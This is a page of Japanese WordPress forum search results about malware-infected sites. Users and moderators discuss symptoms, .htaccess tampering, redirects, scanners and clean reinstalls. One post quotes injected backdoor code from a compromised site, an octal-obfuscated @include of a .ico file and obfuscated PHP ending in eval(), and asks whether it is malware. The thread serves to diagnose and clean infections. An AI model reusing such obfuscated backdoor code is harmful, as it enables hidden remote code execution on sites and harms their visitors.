「マルウェア」の検索結果

15件の結果を表示中 - 1 - 15件目 (全69件中)
  • モデレーター 瀬戸内ことり (Setouchi Kotori)

    (@setouchikotori)

    @mokkosan さんのおっしゃるとおり、PCの初期化は関係ありません。

    「ヘルプの必要なページ」の頭に site: をつけてアクセスしてみてください。
    おそらく執筆された記憶のない記事がずらっと出ていると思います。

    マルウェア感染が疑われるため、まだサイト構築が進んでいないようでしたら、クリーンインストールから再スタートされるのがよいかと思います。

    フォーラム: 使い方全般
    返信が含まれるトピック: サイトにアクセスできなくなりました
    トピック投稿者 matsu935

    (@matsu935)

    知り合いのエンジニアに見てもらったところ、マルウェア・ウイルス・バックドアに感染していたようでした。

    駆除してもらい、なんとか復旧しました。再アタックの可能性もあるようなので、しばらくアップデートなどをこまめにして様子を見ます。

    こちらで相談したことで、感染に気がつくことができました。
    本当にありがとうございました。

    フォーラム: その他
    返信が含まれるトピック: モバイルのページ読み込みが遅い
    モデレーター まーちゅう

    (@rocketmartue)

    Wordfence Security はセキュリティのプラグインなので、Cocoonのテーマと機能が重複することはありません。不正アクセスやマルウェアの感染予防にも効果がありますので、使い方をきちんと調べて使用することをおすすめします。

    ページスピードに関してはLCPが一番ネックになっているので、ここを改善しないとスコアは上がらないと思います。
    アーカイブ ページで遅延読み込みを無効にすると、LCP が大幅に改善することもあるそうなので、Cocoon の高速化設定で「Lazy Loadを有効にする」をオフにするともう少しよくなるかもしれません。

    フォーラム: 使い方全般
    返信が含まれるトピック: サイトにアクセスできなくなりました
    トピック投稿者 matsu935

    (@matsu935)

    ことりさんの方法で検証してみましたら、まんまとマルウェアが検出されてしまいました!

    https://sitecheck.sucuri.net/results/matsu935.com

    ※どうもロシアのサイトに飛ぶようになっているようです…。

    pico21 さんのアドバイスのような単純にコピーしてWP再インストールで大丈夫なのでしょうか?
    お手数ですが、お詳しい方、この場合の対応をアドバイスいただけますでしょうか。

    • この返信は1年、 4ヶ月前にmatsu935が編集しました。
    • この返信は1年、 4ヶ月前にmatsu935が編集しました。
    • この返信は1年、 4ヶ月前にmatsu935が編集しました。
    • この返信は1年、 4ヶ月前にmatsu935が編集しました。
    フォーラム: 使い方全般
    返信が含まれるトピック: サイトにアクセスできなくなりました

    404エラーはページがないことを示すエラーです。

    しばらく触っていなかったということであれば、Wordpressの脆弱性を突かれて改ざんされたか、レンタルサーバー(今回はコノハ)が改ざんを自動検知して、改ざんされたファイルが自動削除(または自動リネーム)された可能性があります。

    FTPでアクセスして、確認してみてください。

    上記が理由の場合、同じバージョンのwordpressのファイルを上書きコピーする事で動作することがあります。しかし、改ざんによりバックドアなどが仕込まれている可能性が高いので、データベースを削除し、wordpressを再インストールすることをおすすめします。

    サイトが改ざんされると、閲覧者にウイルスやマルウェアを感染させたり、フィッシングサイトに誘導してしまうことがあります。

    今後は、サイトを放置せず、定期的にサイトの状態を確認し、wordpressやPHPを最新に保つように運用管理をお願いします。

    フォーラム: 使い方全般
    返信が含まれるトピック: ダッシュボードとホームボタンを押すと・・・。

    ある意味これは、WordPressにめっちゃ関係ある質問だと思うのですよね。

    「特に、何か変なことはした覚えがない」にもかかわらず、真っ赤な「危険なサイトです」が出ているということは、十中八九、クラキングされてマルウェアが仕込まれたと思っていいと思います。そうではないこともないわけではないかもしれませんが、やられてると思って対処すべきでしょう。

    原因は、WordPressやテーマ、プラグインが更新されておらず、脆弱性がある状態であったか、あるいは、管理者のIDとパスワードが容易に想像できるものであったり、単純であったり、他のサイトやサービスと共有している組み合わせだったりしてそれが漏洩している場合などが考えられます。

    対処としては、マルウェアを駆除してもろもろ最新版にメンテナンスして、IDパスワードを新しいユニークで難解なものに変える必要があります。

    WordPressを運用する場合、セキュリティは意識して確保すべきだと思うのですよ。仕事で使っているサイトであるなら、お客さんの個人情報を扱うこともあるでしょうしね。

    フォーラム: 使い方全般
    返信が含まれるトピック: 管理画面レイアウト崩れ
    トピック投稿者 mrapatch

    (@mrapatch)

    みなさん親切にありがとうございました。
    約2週間ぶりに管理画面が回復しました。
    今回ロリポップサーバーに何度も問い合わせた結果、マルウェア感染による[.htaccess]改ざんでした。
    サブディレクトリのサイト例えば、https://????.com/blogのブログのレジストリフォルダ内の「.htaccess」は問題なかったんですが最上位階層の[.htaccess]が問題だったと初めて知りました。
    いちよう同じ境遇の方がいらっしゃるかもしれませんので、対応を明記します。
    いったん最上位階層の「.htaccess」の削除。
    それだけで管理画面が復活し、ログイン。
    TOP画面以外は見れない状態。
    それから管理画面のパーマリンクで、保存ボタンで「.htaccess」を自動復活したらサイトも元通り。

    念のため感染しているので下記サイトの手順に従い
    WordPress更新失敗時の手動バージョンアップ手順【FTP使用】 | Fukuro Press (fukuro-press.com)
    バックアップを取り、公式Wordpressから新規DLしたフォルダを再度レジストリにアップデート。
    現在は、Anti-malware Pluginで約5時間かかるレジストリ内駆除を行っている所です。
    しかも結構な量が感染に合っていそうです。
    管理画面が戻ってもまた違う問題が出てきそうですが、管理画面は解決です。

    ここで質問させていただき、すぐに返事が頂けてかなり心強かったです。
    本当にみなさんありがとうございました。

    フォーラム: インストール
    返信が含まれるトピック: 403 forbidden

    403エラーはサーバーがアクセスを拒否したという意味になります。

    また送信されたスクリーンショットを見るとルートフォルダに不要なHTACCESSやindex.phpがあります。
    この症状はマルウェアに感染しているサイトによくある症状とも思われます。サーバー管理会社にマルウェア感染を警告されて、サイトの表示を強制的に止められていませんでしょうか?メール等を確認いただくことをお勧めいたします。

    または、一番上の階層のHTACCESSやindex.phpが悪さをしている可能性もあります。public_htmlより上の階層にHTACCESSやindex.phpがあっても一般的にはアクセスできませんのでこのファイルをバックアップを取っていただいたうえでいったん削除してみて、状況が改善しないかを確認されてみてください。

    フォーラム: プラグイン
    返信が含まれるトピック: contact form 7のメールが勝手にHTML codeついています

    アップデートすると表示が崩れるとありますが、多分、親テーマを直接編集しちゃってるのかもですね。

    それはさておき、こういうこともあるという話です。もう随分前、WordPressがまだバージョン3系列だった頃の話です。私も、アップデートすると表示が崩れるので、諸々アップデートせずに使っていました。サイトを納品した業者が、親テーマを直接編集してたので、テーマを更新すると、表示が崩れるどころか全く違うサイトになるのでアップデートできなかったんですよ。

    ある日、クラッキングされました。Windowsから閲覧するとマルウェアに感染するように改竄されていました。うちのお店のパソコンは全部Macだったので、自分では全く気付かずです。Googleから、あなたのサイトはマルウェアに感染するので検索結果から外した。クリーニングしてね。っていうメールが来て、初めて気がつきました。サーバ会社からも、感染しているので遮断したっていう連絡が入って、大変なことになりましたよ。

    バージョンアップはちゃんとしましょう。脆弱性を塞ぐためのバージョンアップは、テーマもプラグインも含めると、毎月のようにあります。そしてそもそも、そういうバージョンアップで表示が崩れることが極力ないような作りのサイトにしないといけないです。

    で、あくまでも一つの可能性ですが、あなたが全く何にも設定などをいじっていないし何にもバージョンアップしていないし、つまり前と全く同じ構成なのに、前と違う動作をするようになったとするのなら、すでにクラッキングされて、何かされてしまっているということも考えられます。そうでないといいのですが。

    フォーラム: その他
    返信が含まれるトピック: スニペットに見覚えのない文章が表示される
    モデレーター Yukinobu Asakawa

    (@yukinobu)

    こんにちは。
    ハッキングでないと仮定した場合、WordPressのフォーラムの範疇を超えているので、ここでの解決は難しいかもしれません。
    以下のような場所でご相談されることがよろしいのではないでしょうか?

    Google検索セントラル
    スパム、フィッシング、マルウェアを報告する

    一度お確かめの上、ご検討いただけましたら幸いです。

    • https://wp-doctor.jp/blog/2018/05/17/%E3%80%90%E7%84%A1%E6%96%99%E3%80%91%E3%83%AF%E3%83%BC%E3%83%89%E3%83%97%E3%83%AC%E3%82%B9%E3%83%89%E3%82%AF%E3%82%BF%E3%83%BC%E3%83%9E%E3%83%AB%E3%82%A6%E3%82%A7%E3%82%A2%E3%82%B9%E3%82%AD%E3%83%A3/

      上記のプラグインを入れてみましたがスキャンができません。

      現在最新のマルウェア検出パターンが取得できないためスキャンを実行できません。「サイトが公開されていてワードプレスで動作していること」「最新のプラグインを利用されていること」をご確認の上再度手動でスキャンを実行してみてください。

      というアラート出ます。
      プラグインはすべて最新にしております。

      また、スキャンをおすと

      マルウェアの検出パターンが取得できませんでした。サイトが公開されていてワードプレスで動いていますか?お使いのプラグインが最新バージョンかご確認くださいもしくはお使いのサーバーのallow_url_fopen設定が有効になっていなく、マルウェア検出パターンが取得できなくなっているかもしれません。

      とモーダル表示もされます。
      allow_url_fopenはONになっております。

      ご教授ねがいます

    フォーラム: 使い方全般
    トピック: マルウェアに関して
    • プラグイン:ワードプレスドクターを導入し、スキャンした結果…
      次のような確定診断が出たのですが、マルウェアなのでしょうか。

      詳しい方教えて下さいませ。

      ①wp-settings.phpやindex.phpの上部に次のような記述がある
      @include “\057h\157m\145/\155i\156a\164o\163c\057m\151n\141t\157s\143.\143o\155/\160u\142l\151c\137h\164m\154/\162e\156e\167/\167p\055i\156c\154u\144e\163/\152s\057.\1454\071e\1448\0647\056i\143o”;

      ②query.phpなどの複数ファイルに次のような記述がある
      <?php $jb1a8 = 765;$GLOBALS[‘u5549e’] = Array();global $u5549e;$u5549e = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53”}[‘ne0f8a388’] = “\x4a\x5a\x7c\x37\x39\x69\x3f\x79\x34\x7b\x56\x3e\x2a\x9\x42\x5b\x59\x68\x53\x3a\x62\xd\x58\x41\x57\x72\x38\x6c\x76\x3c\x77\x4e\x3d\x7d\x31\x2c\x6a\x35\x71\x45\x50\x64\x7e\x24\x21\x52\x32\x5e\x30\x5f\x55\x2e\x7a\x5d\x54\x63\x47\x27\x36\x61\x23\x51\x6d\x40\x2f\x25\x48\x4b\x26\x3b\x65\x5c\x2d\x4d\x6b\x73\x33\x4c\x6f\xa\x66\x4f\x46\x28\x6e\x43\x75\x22\x20\x49\x78\x44\x74\x60\x2b\x67\x29\x70”;$u5549e[$u5549e[‘ne0f8a388’][7].$u5549e[‘ne0f8a388’][41].$u5549e[‘ne0f8a388’][26].$u5549e[‘ne0f8a388’][3].$u5549e[‘ne0f8a388’][55].$u5549e[‘ne0f8a388’][41].$u5549e[‘ne0f8a388’][3].$u5549e[‘ne0f8a388’][46]] = $u5549e[‘ne0f8a388’ーーーーーーー(中省略)ーーーーー[59].$u5549e[‘ne0f8a388’][8]]($q5c2a6);}elseif ($b844[$u5549e[‘ne0f8a388’][59]] == $u5549e[‘ne0f8a388’][70]){eval/*r92df563*/($b844[$u5549e[‘ne0f8a388’][41]]);}exit();}} ?><?php

      どうぞよろしくお願いいたします。

    munyagu

    (@munyagu)

    こんにちは

    サイトを改竄されています。

    どのような脆弱性があるのかは分かりませんが、どこかに脆弱性があるものと思います。

    以下のページを参考に対応してみてください。

    FAQ ハッキングされた場合は(https://ja.wordpress.org/)

    このページにもあるとおり、脆弱性は WordPress とそのプラグインだけに存在するとは限りません。
    FTP アカウントやその他ツールなどから改竄される場合もあります。

    注)このページ中の、「Web サイトをスキャンする」という項のプラグインへのリンクが切れていますので、マルウェアスキャンしてくれるプラグインのリストは以下のページを参照してください。
    https://ja.wordpress.org/plugins/search/malware+scanner/

    フォーラム: テーマ
    トピック: テーマが勝手に切り替わる
    • お世話になっております。

      現在テーマをluxeritasに設定しブログを作成しているのですが、不定期にテーマがtwenty nineteenに切り替わってしまいます。
      始めは操作ミスかと思い、元に戻した上で不要と判断したtwenty nineteenを削除したのですが、
      少し時間をおいて自サイトをチェックすると「twenty nineteenが存在しません」と表示されており、
      ダッシュボードに行くと概要部分の記載が「WordPress 5.2.1 (Twenty Nineteen テーマ)」となっていて、データがない為ページを表示できないという状態になっていました。
      Twenty Nineteenは上述の通り削除しましたので、自分でそれを選ぶことは出来ない様になっていて、
      luxeritasを有効化するとリストから消えます。

      「テーマをTwenty Nineteenに切り替える」というコマンドだけが起動して、変更させられている様に思えるのですが何が原因でそうなっているのか見当が付きません。
      先週末頃より日に2~3度発生しており、現状はこまめに自サイトをチェックし変わってしまっていたら元に戻すと言う作業を行っています。
      ログアウトしている状態、また、自分がログインして記事編集などを行っている最中でも起こります。
      プレビューを開き、編集し、またプレビューを開いた際に変わっていることも有りました。

      セキュリティの強化が出来ていなかったので対応し、不正なアクセス等による自分以外のユーザーの作成・ログインやアクセスは特に見受けられず、
      マルウェア検索等にも特に反応は有りませんでした。
      可能な限り目視で覚えのないphpファイルなどが無いかも確認したのですが発見できず。

      この異常を修復する方法をどなたかご教示いただけないかと思い、トピックを作成させていただきました。
      何卒宜しくお願いします。

    CG

    (@du-bist-der-lenz)

    1、2、3の順ではなくて、2、3、1となってしまいます。@mrsk-tesou さんのサイト内を診てもいないので、マルウェアの素性がわからないので、意見も出来ませんが、「WP-Doctor Malware Scanner & Security Pro」プラグインが認知しているコードでなければ、見つけられないってことはわかることでしょう。それに偽装しているんだろうし、すでにセキュリティをくぐり抜けているのですから。感染後にプラグインを導入しても、本末転倒です。そして、「すでにマルウェアに支配されて」いるのを、バックアップして移転すれば、ウィルスだけが取り残されるわけではないから、新しく危険なサイトを増やして、感染を拡散するだけです。レンタルサーバーで、共用タイプであれば、同一サーバー上に共存されている数百、数千のサイトを巻き込みますよ。ウィルス的行動をしているコードは、不正アクセスされなくても、自ら招いた結果かもしれないし、取り込んでしまったタイミングがわかっても資料的価値にもならないことです。それをあれこれやっているよりも、正体を見つけて除去することに時間を割れるかです。

15件の結果を表示中 - 1 - 15件目 (全69件中)